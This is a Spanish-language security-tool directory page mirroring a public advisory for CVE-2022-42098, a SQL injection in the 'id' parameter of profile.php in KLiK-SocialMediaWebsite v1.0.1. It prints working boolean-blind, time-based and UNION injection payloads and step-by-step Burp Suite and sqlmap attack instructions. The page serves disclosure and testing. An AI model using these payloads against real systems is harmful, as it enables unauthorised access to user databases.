Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2022-42098 — KLiK-SocialMediaWebsite v1.0.1 tiene vulnerabilidades de inyección SQL en profile.php. | Kitploit
Herramientas/GitHubGitHub/bypazs/cve-2022-42098
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebRecopilación de InformaciónPruebas de Penetración
GitHubbypazs/cve-2022-42098

CVE-2022-42098

KLiK-SocialMediaWebsite v1.0.1 tiene vulnerabilidades de inyección SQL en profile.php.

Ver Repositorio
1hace 3 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

KLiK-SocialMediaWebsite versión v1.0.1

Explicación de la vulnerabilidad:

KLiK-SocialMediaWebsite v1.0.1 tiene vulnerabilidades de inyección SQL en profile.php en el parámetro id.

Vectores de ataque:

KLiK-SocialMediaWebsite v1.0.1 Una vez que se ha creado un usuario, también se pueden encontrar personas en KLiK a través de la página de usuarios de KLiK. El parámetro "id" de profile.php puede ser abusado para inyectar consultas SQL arbitrarias.

Afecta:

  • http://ip_address/KLiK/profile.php?id=user_id
  • GET /KLiK/login.php

Payload :

root@kitploit:~
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=27 AND 3227=3227

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=27 AND (SELECT 3046 FROM (SELECT(SLEEP(5)))barN)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 11 columns
    Payload: id=-2373 UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x71787a7171,0x6d67676474624545784f564265735871415865575a4f72697053686d724768624969514c70754459,0x717a707071),NULL,NULL,NULL,NULL,NULL,NULL#

Probado en:

  1. KLiK SocialMediaWebsite versión v1.0.1 (https://github.com/msaad1999/KLiK-SocialMediaWebsite/releases/tag/v1.0.1)

  2. Firefox versión 105

  3. sqlmap versión 1.6.7 estable

Pasos para atacar:

  1. Iniciar sesión con nombre de usuario y contraseña.
  2. Hacer clic en el icono que representa una persona en la esquina superior derecha.
  3. Interceptar la solicitud usando Burp Suite.
  4. Seleccionar un individuo de la página de usuarios de KLiK haciendo clic en su nombre.
  5. Regresando a Burp Suite, en /profile.php, hacer clic derecho y seleccionar "Copiar a archivo".
  6. Enviar el archivo de solicitud a Kali Linux y usar sqlmap con él.
  7. Vulnerabilidad de inyección SQL descubierta a través de id

Descubridor:

:shipit: Grim The Ripper Team por SOSECURE Thailand

Medio:

Cronograma de divulgación:

  • 2022–09–28: Vulnerabilidad descubierta.
  • 2022–09–28: Vulnerabilidad reportada a la corporación MITRE.
  • 2022–10–15: CVE ha sido reservado.
  • 2022–10–31: Divulgación pública de la vulnerabilidad.

Referencia:

  1. https://github.com/msaad1999/KLiK-SocialMediaWebsite/releases/tag/v1.0.1

  2. https://github.com/msaad1999/KLiK-SocialMediaWebsite

Descargar herramienta